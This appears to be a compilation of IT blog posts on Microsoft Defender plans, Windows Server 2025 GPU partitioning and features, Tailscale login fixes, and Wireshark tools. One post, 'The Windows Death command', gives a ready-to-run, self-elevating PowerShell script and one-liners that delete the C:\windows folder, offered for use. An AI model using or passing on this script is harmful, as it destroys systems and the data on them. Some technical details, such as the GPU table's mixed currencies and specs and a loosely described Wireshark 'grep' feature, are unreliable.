What Are the Differences Between Microsoft Defender for Office 365 P1 & P2, and Is It Worth the Price Difference?

What Are the Differences Between Microsoft Defender for Office 365 P1 & P2?

When it comes to protecting your organisation from email-based threats, Microsoft Defender for Office 365 is a leading solution. But with two plans available — Plan 1 (P1) and Plan 2 (P2) — it can be difficult to know which is the best fit for your business. In this article, we’ll compare the two plans and help you decide if the additional features in Plan 2 are worth the higher cost.

Key Differences Between Plan 1 (P1) and Plan 2 (P2)

FeaturePlan 1 (P1)
£1.64 user/month
Plan 2 (P2)
£4.10 user/month
Protection Against PhishingYesYes
Anti-Spam ProtectionYesYes
Safe LinksYesYes
Safe AttachmentsYesYes
Threat IntelligenceYesYes
Attack SimulatorNoYes
Automated Investigation and RemediationNoYes
Advanced Threat Protection ReportsNoYes
Custom Policies for Safe LinksNoYes
Advanced Threat HuntingNoYes
Real-time Threat DetectionNoYes

Plan 1: Essential Protection for Office 365

Plan 1 provides essential protection against common email threats like phishing, malware, and spam. Here’s what you get with Plan 1:

  • Protection Against Phishing: Helps to identify and block phishing attacks targeting your users.
  • Anti-Spam Protection: Blocks unwanted email and protects against spam.
  • Safe Links: Provides real-time protection by scanning URLs in email messages to prevent users from clicking on malicious links.
  • Safe Attachments: Scans email attachments for potential threats and isolates them for analysis.

Plan 1 is ideal for businesses that need basic email protection and are using Microsoft 365 services for communication and collaboration.

Features Only Available in Plan 2

Plan 2 builds on the protection offered in Plan 1 and adds additional advanced features for organisations that need more sophisticated defences. In addition to everything in Plan 1, Plan 2 includes:

  • Attack Simulator: Helps simulate real-world phishing attacks to test your organisation’s security awareness and training.
  • Automated Investigation and Remediation: Automatically investigates and remediates threats to reduce manual intervention and improve response times.
  • Advanced Threat Protection Reports: Provides in-depth reporting on threats targeting your organisation.
  • Custom Policies for Safe Links: Customises the protection of URLs to suit your organisation’s specific security needs.
  • Advanced Threat Hunting: Allows you to proactively search for and identify potential threats within your environment.
  • Real-time Threat Detection: Detects and responds to advanced threats in real time, ensuring quicker mitigation.

Plan 2 is designed for organisations that require more advanced protection and want automated security management, as well as additional tools for threat investigation and prevention.

These exclusive capabilities make Plan 2 the go-to choice for businesses that need more control over their email security and quicker, more efficient responses to emerging threats.

Is the Extra Cost for Plan 2 Worth It?

Choosing between Plan 1 and Plan 2 depends on the needs of your organisation, your budget, and the level of protection you require. Here’s a quick breakdown:

  • Plan 1: Best for smaller organisations or those who only need essential protection for email security. It’s a cost-effective option that provides solid defences and is included in Microsoft 365 Business Premium and Microsoft 365 E3 licences.
  • Plan 2: Ideal for larger organisations or those with higher security needs. Plan 2 includes all features of Plan 1 plus advanced protection tools, custom policies, and automation. Plan 2 is available with Microsoft 365 E5 licences.

If your organisation faces a higher risk of targeted attacks, or you need enhanced security and more automation, the additional cost for Plan 2 could be well worth it for the added peace of mind.

What GPU’s does Windows Server 2025 support for GPU Partitioning? [Solved]

Supported GPUs for GPU Partitioning in Windows Server 2025

Virtualization has transformed IT, enabling us to run multiple VM’s and OS’s on a single server. But for resource-intensive tasks like AI and machine learning, powerful graphics processing is essential. This is where Windows Server 2025’s GPU partitioning comes into play, allowing multiple virtual machines (VMs) to share a single GPU’s power, optimising usage and enhancing workload capacity.

What is GPU Partitioning?

With GPU partitioning, a single physical GPU can be split into multiple virtual GPUs (vGPUs), each assigned to different VMs. This enables simultaneous execution of resource-heavy tasks, like AI and ML workloads, all on a shared GPU—making it a game-changer for high-demand environments.

Supported GPUs

Currently only a handful of NVIDIA GPUs currently support partitioning with Windows Server 2025. Here’s a list of the compatible graphics cards supported for Windows Server 2025 for GPU Partitioning:

GPU ModelRough Cost (USD)CUDA CoresTF32 teraFLOPS or Tensor CoresMemory (GB)TDP (Watts)
NVIDIA A2£1300-1800128040-601640-60
NVIDIA A10£2300+8192275-41024150
NVIDIA A16£2700+5120 (4x 1280)4x 40 Cores64250
NVIDIA A40£5100+10,75274.8 – 149.648300
NVIDIA L2Not out yetn/a48.324TBD
NVIDIA L4£2500+n/a1202472
NVIDIA L40£7500+18176568 | Gen 4 Cores48300
NVIDIA L40S£9700+18,17636648350

Notes

  • My pick would be the NVIDIA A16 currently offering what is basically 4 GPU’s on one card already making it ideal for partitioning.
  • Details for some GPUs, especially newer models, are limited and may change as they become more widely available.
  • Most of these cards are made for the enterprise market, so don’t go thinking you will suddenly be able to set up 4 gaming PC’s on one server and get good graphic results! Whilst it may be possible, these are designed more around tensor cores, useful for AI and deep learning than Cuda cores, which are more multipurpose.

Windows Server 2025’s GPU partitioning unlocks powerful capabilities for optimising hardware and running demanding workloads. While limited to specific NVIDIA GPUs, it’s a step forward for those looking to enhance their system’s efficiency and boost VM computational power. Understanding which GPUs work best for what workloads will become the next big learning curve!

Windows Server 2025: My Top New Favourite Features

Windows Server 2025: Enhanced Security, Performance, and Cloud Integration

It’s finally here! Microsoft has unveiled its latest server operating system, Windows Server 2025, and it should provide significant advancements in performance, security, and cloud integration. Below are some of the features that stuck out to me with my first install.

My Top 5 New Features of Windows Server 2025

  • Block Cloning: This feature significantly improves file copy performance, especially for large files, optimising file operations by copying only modified blocks, reducing I/O and improving performance for large files.
  • SMB over QUIC: This enables secure access to file shares over the internet, providing faster and more reliable file transfers using native SMB technologies.
  • Hotpatching: This allows for the application of security updates to running servers with minimal downtime, no more out of hours scheduling of reboots!
  • GPU Partitioning: This lets you split up GPU resources by allowing them to be divided into smaller, virtualized GPUs, adding GPU resources to a VM? Yes please!.
  • Enhanced Active Directory: This includes features like AD object repair, optional 32k database page size, and improved security for confidential attributes and default machine account passwords.

Key Features of Windows Server 2025:

  • Enhanced Security: Robust security measures, including hardened SMB protocols, improved Active Directory, and enhanced protection against cyber threats.
  • Accelerated Performance: Significant performance boosts for virtualization, storage, and networking, especially for AI and machine learning workloads.
  • Seamless Cloud Integration: Improved integration with Azure for hybrid and multi-cloud environments, enabling seamless workload migration and management.
  • Modernized Infrastructure: Support for the latest hardware and software technologies, including NVMe storage and GPU acceleration.

    Its just a bit better in every way from Server 2022 – and 100% better than 2012 R2!

Feature Windows Server 2025 Windows Server 2022 Windows Server 2012 R2
Security Enhanced security protocols, improved AD, stronger threat protection Robust security features, including shielded VMs and credential guard Basic security features with early Active Directory improvements and Security Essentials
Performance Accelerated virtualization, storage, and networking, optimized for AI/ML Strong performance, especially for virtualization and storage Improved performance for Hyper-V and storage, but limited optimization for newer technologies
Cloud Integration Deeper Azure integration, seamless workload migration Good Azure integration, basic hybrid cloud capabilities Limited cloud integration, early support for hybrid environments with System Center
Hardware Support Support for latest hardware, including NVMe and GPU Support for modern hardware, including NVMe Support for basic hardware configurations; limited support for emerging hardware like NVMe
 

In summary, Windows Server 2025 steps up the game with smarter security, better performance, and seamless cloud connectivity. From the efficient file handling with Block Cloning to downtime-reducing Hotpatching, it’s clear this release is built to make life easier for us admins. Adding GPU Partitioning for VM flexibility and enhanced AD features, Microsoft has pushed the envelope to give us a modern, future-proof server OS that seamlessly connects to Azure and Entra.

With all these updates, Windows Server 2025 is a significant improvement over its predecessor, Windows Server 2022, and a massive leap from the now-aged Server 2012 R2. Finally, if you are thinking about upgrading now EOL servers. This one’s worth it!

Logging into Tailscale using Microsoft O365 Credentials on Windows

Follow these steps to log into Tailscale using Microsoft O365 credentials:

  1. Pre-requisites:
    • Ensure the PC is connected to the internet.
    • Confirm that Tailscale is installed.
  2. Locating the Taskbar Icon:
    • Look for the Tailscale icon in the Windows taskbar, usually near the clock.
  3. Clicking the Icon:
    A. Click on the Tailscale icon, or right click and select ‘log in’ to initiate the login process.
    B. If this doesn’t work, check if there is using multiple network interfaces (e.g., Wi-Fi and Ethernet) simultaneously. If multiple interfaces are being used,  set the interface’s “Automatic Metric” to manual and enter a value.
  4. Microsoft O365 Sign-in:
    • A Tailscale login window will appear.
    • Select the “Sign in with Microsoft” option.
  5. Redirect to Microsoft Login:
    • The default browser will be opened and redirected to the Microsoft O365 login page.
    • Use O365 credentials (email and password).
  6. Two-Factor Authentication (if applicable):
    • If prompted for two-factor authentication, complete the required steps.
  7. Granting Permissions (if applicable):
    • If windows, or O365 asks to grant permissions, review the requested permissions and click “Allow” or “Accept.”
  8. Connecting to the Network:
    • After successful login, the Tailscale app will attempt to establish a secure connection to the network.
  9. Check connection
    • Check if it says ‘connected’ or ‘disconnected’ in the taskbar.
  10. Done. 

[Solved] Clicking on Tailscale icon does not let me login

Occasionally i have come accross a Tailscale client that does not initially want to display the log in page.

I originally also tried running CLI commands like “tailscale up –authkey xxxxxxxxxx” as well – it seems to hang.

tailscale login icon in taskbar

So when CLI and clicking on the icon in the taskbar via the GUI to log in doesn’t work – Check your network cards!
This is usually caused when Tailscale cannot tell which network card has priority.

On Windows:

Win + R //to open run
ncpa.cpl //to open the network settings
Select main network card
Open Properties, then IPv4
Click on Advanced, untick ‘Automatic Metric
Set to 10.

setting network card interface metric to solve tailscale issues

Try again. Chances are, tailscale will now let you login and generate the login page popup allowing sign on. Authkey authentication should also now work.

tailscale login screen in browser

The Windows Death command – How to kill a windows PC [Revisited]

So about 7 years ago I wrote the original blog post on killing a windows PC.
Turns out it was one of my most popular posts! So with that in mind, lets update that script to use Powershell – seeing as it is 2023 now.

The core basics of the command have not changed much, just the delivery method.
Below is the new Windows Death command:
TakeOwn /F C:\windows /R /D Y
Remove-Item -Recurse -Force C:\windows

Simply run the above in an elevated powershell window to wipe the PC.
It really is that simple.

Now how do we make this into a file that we can just right click and run?
Copy and paste the below into a file, and name it PCKiller.PS1 or similar- then right click and ‘Run with Powershell’ Simple as that:
# Check if script is running as administrator
if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
{
# If not running as administrator, elevate permissions
$arguments = "& '" + $myinvocation.mycommand.definition + "'"
Start-Process powershell -Verb runAs -ArgumentList $arguments
Break
}

# Set window title and colors
$host.UI.RawUI.WindowTitle = "Destroy Windows PC"
$host.UI.RawUI.WindowPosition = "maximized"
$host.UI.RawUI.BackGroundColor = "green"
$host.UI.RawUI.ForeGroundColor = "white"
Clear-Host

# Take ownership of the Windows folder
TakeOwn /F C:\windows /R /D Y

# Get the total number of files and directories to be deleted
$total = (Get-ChildItem -Recurse C:\windows | Measure-Object).Count
$current = 0

# Delete the files and directories
Get-ChildItem -Recurse C:\windows | Remove-Item -Force -Recurse -Verbose -ErrorAction SilentlyContinue | ForEach-Object {
$current++
Write-Progress -Activity "Deleting files" -Status "Progress: $current/$total" -PercentComplete (($current/$total)*100)
}

This script first takes ownership of the Windows folder using the TakeOwn command, just like in the previous version. It then uses the Get-ChildItem command to get a list of all files and directories in the Windows folder and its subfolders. The Measure-Object command is used to count the total number of items, and this count is stored in the $total variable.

Next, the script uses a ForEach-Object loop to iterate over each item in the list and delete it using the Remove-Item command. The -Verbose parameter displays a message for each item that is deleted, and the -ErrorAction SilentlyContinue parameter tells the script to continue running even if an error occurs (such as if a file is in use). The Write-Progress command is used to display a status bar showing the progress of the deletion.

Or if you still like using command prompt, the original an still the best as previously posted will still work:
del /S /F /Q /A:S C:\windows

Using Wireshark to Troubleshoot Network Connectivity Issues: Summary

Wireshark is a powerful tool for network support technicians who are trying to troubleshoot connectivity issues and optimize network performance. In this series, we have covered a number of features in Wireshark that can be particularly useful for troubleshooting network issues, including:

  • “Follow TCP Stream”
  • “Decode As”
  • “IO Graphs”
  • “Expert Infos”
  • “Time Sequence Graph (tcptrace)”
  • “Conversation Filter”
  • “Graphical Time Sequence (grep)”
  • “Statistics”

In the following summary, we will provide a brief overview of each of these features and how they can be used to troubleshoot network issues.

  • “Follow TCP Stream” allows you to see all of the packets in a particular TCP stream in a single window, making it easier to understand the conversation between two devices.
  • “Decode As” allows you to change the way that Wireshark decodes and displays a particular protocol, which can be useful when the default decoding is not correct or when you want to see more detailed information about the protocol.
  • “IO Graphs” allows you to create graphs of packet and byte rates over time, which can help you identify trends and patterns in network traffic.
  • “Expert Infos” displays alerts and warnings about potential problems with the packets being captured, such as retransmissions or out-of-order packets.
  • “Time Sequence Graph (tcptrace)” displays a graph of TCP packet sequence numbers over time, which can help you identify problems with the TCP connection.
  • “Conversation Filter” allows you to filter the packets being displayed based on their source and destination addresses, which can be useful when you are trying to focus on a specific conversation.
  • “Graphical Time Sequence (grep)” displays a graph of packet transmission times over time, which can help you identify trends and patterns in network traffic.
  • “Statistics” provides a wide range of statistical information about the packets being captured, including “Protocol Hierarchy,” “Endpoints,” “IO Graphs,” “Conversations,” “Flow Graph,” “TCP Stream Graphs,” and “HTTP.”
  • “Protocol Hierarchy” displays a graphical representation of the protocols being used on your network, with the most frequently used protocols at the top. It is useful for identifying potential problems with your network.

Overall, Wireshark is a powerful tool that can be used to troubleshoot a wide range of network connectivity issues. By using the features discussed in this series, network support technicians can quickly and effectively identify and resolve problems with their networks, improving overall performance and reliability. Whether you are a seasoned network support professional or just starting out, learning how to use Wireshark is a valuable skill that can help you troubleshoot and optimize your network.

[SOLVED] Using Wireshark to Troubleshoot Network Connectivity Issues: Statistics

Using Wireshark to Troubleshoot Network Connectivity Issues: Statistics

In addition to the “Follow TCP Stream,” “Decode As,” “IO Graphs,” “Expert Infos,” “Time Sequence Graph (tcptrace),” “Conversation Filter,” and “Graphical Time Sequence (grep)” features, Wireshark also includes a tool called “Statistics” that provides a wide range of statistical information about the packets being captured.

To use the “Statistics” feature, simply select the “Statistics” menu and then choose the type of statistical information that you want to view. Wireshark provides a number of different options, including “Protocol Hierarchy,” “Endpoints,” “IO Graphs,” “Conversations,” “Flow Graph,” “TCP Stream Graphs,” and “HTTP.”

Part A: How to Use the Protocol Hierarchy
To use the “Protocol Hierarchy” option in the “Statistics” feature in Wireshark, follow these steps:

Select the “Statistics” menu and then choose “Protocol Hierarchy.”
In the “Protocol Hierarchy” window, you will see a graphical representation of the protocols being used on your network, with the most frequently used protocols at the top.
To view more detailed information about a specific protocol, click on the protocol in the graph. This will open a new window with a breakdown of the packets being captured for that protocol.

Part B: Why the Protocol Hierarchy is Useful
The “Protocol Hierarchy” option in the “Statistics” feature is useful for a number of reasons:

It provides a high-level overview of the protocols being used on your network. By seeing which protocols are being used the most, you can get a sense of the types of traffic that are generating the most activity on your network.

It helps you identify any potential problems with your network. For example, if you see that a particular protocol is being used much more frequently than others, it could be a sign that there is a problem with that protocol or that it is being used excessively.

It allows you to drill down into specific protocols to get more detailed information. By clicking on a specific protocol in the graph, you can open a new window with a breakdown of the packets being captured for that protocol, which can help you identify any issues with the packets or the protocol itself.

It helps you optimize your network by identifying any protocols that are using up too much bandwidth or causing other performance issues. By identifying and addressing these issues, you can improve the overall performance of your network.

Overall, the “Protocol Hierarchy” option in the “Statistics” feature in Wireshark is a valuable tool for network support technicians who are trying to troubleshoot connectivity issues and optimize network performance.

[SOLVED]Using Wireshark to Troubleshoot Network Connectivity Issues: Graphical Time Sequence (grep)

Using Wireshark to Troubleshoot Network Connectivity Issues: Graphical Time Sequence (grep)

In addition to the “Follow TCP Stream,” “Decode As,” “IO Graphs,” “Expert Infos,” “Time Sequence Graph (tcptrace),” and “Conversation Filter” features, Wireshark also includes a tool called the “Graphical Time Sequence (grep)” feature that allows you to visualize the flow of traffic between two devices over time in a graphical format.

To use the “Graphical Time Sequence (grep)” feature, simply select the “Statistics” menu and then choose “TCP Stream Graphs -> Time-Sequence Graph (Stevens).” This will open a new window that allows you to choose the stream that you want to visualize.

The “Graphical Time Sequence (grep)” feature shows the flow of traffic between two devices over time, with the x-axis representing time and the y-axis representing the sequence numbers of the packets being sent. You can use this tool to identify any problems with the flow of traffic, such as delays or missing packets.

By using the “Graphical Time Sequence (grep)” feature in combination with other diagnostic tools, such as the “Follow TCP Stream” and “IO Graphs” features, you can gain a deeper understanding of the traffic on your network and identify potential problems. With a little bit of practice and a thorough understanding of the features and techniques available in Wireshark, you can become an expert at troubleshooting network issues and keeping

[SOLVED] Using Wireshark to Troubleshoot Network Connectivity Issues: Conversation Filter

Using Wireshark to Troubleshoot Network Connectivity Issues: Conversation Filter

In addition to the “Follow TCP Stream,” “Decode As,” “IO Graphs,” “Expert Infos,” and “Time Sequence Graph (tcptrace)” features, Wireshark also includes a tool called the “Conversation Filter” that allows you to view the packets being exchanged between two specific devices or between devices using a specific protocol.

To use the “Conversation Filter” feature, simply select the “Statistics” menu and then choose “Conversations.” This will open a new window that displays a list of all the conversations that have been captured.

You can use the “Conversation Filter” feature to view the packets being exchanged between two specific devices or between devices using a specific protocol. To filter the conversations, you can use a variety of criteria, including the source and destination addresses, the protocol being used, and various other packet attributes.

The “Conversation Filter” feature is especially useful when you want to focus on a specific set of packets and see how they are being exchanged between devices. By using the “Conversation Filter” feature in combination with other diagnostic tools, such as the “Follow TCP Stream” and “IO Graphs” features, you can gain a deeper understanding of the traffic on your network and identify potential problems.

How to Use the Conversation Filter
To use the “Conversation Filter” feature in Wireshark, follow these steps:

Select the “Statistics” menu and then choose “Conversations.”
In the “Filter” field at the top of the window, enter the criteria that you want to use to filter the conversations.
Click the “Apply” button to apply the filter and display the filtered conversations.
For example, if you want to see the packets being exchanged between two specific devices, you can enter the IP addresses of the devices in the “Filter” field. If you want to see the packets being exchanged between devices using a specific protocol, you can enter the name of the protocol in the “Filter” field.

With a little bit of practice and a thorough understanding of the features and techniques available in Wireshark, you can become an expert at troubleshooting network issues and keeping your network running smoothly